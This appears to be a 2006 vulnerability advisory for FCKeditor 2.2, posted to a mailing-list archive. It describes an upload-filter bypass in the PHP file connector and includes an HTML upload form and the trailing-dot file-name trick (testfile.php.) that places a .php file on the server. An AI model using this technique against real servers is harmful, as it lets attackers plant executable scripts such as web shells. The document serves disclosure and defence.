Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
NSA Group Security Advisory NSAG-¹196-23.02.2006 Vulnerability FCKeditor 2.2
From: NSA Group (vulnerabilitynsag.ru)
Date: Thu Feb 23 2006 - 15:31:43 CST
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Site of manufacturer:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Detour of a filtration of expansions of files is possible.
Loading of the forbidden files on target system.
<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
<input id="txtFileUpload" type="file" name="NewFile">
<input type="submit" value="Upload">
In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.)
As a result on a server the file testfile.php will be created
The decision from the manufacturer is not known. Contact us and receive consultations.
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!
«Nemesis» © 2006
Nemesis Security Audit Group © 2006.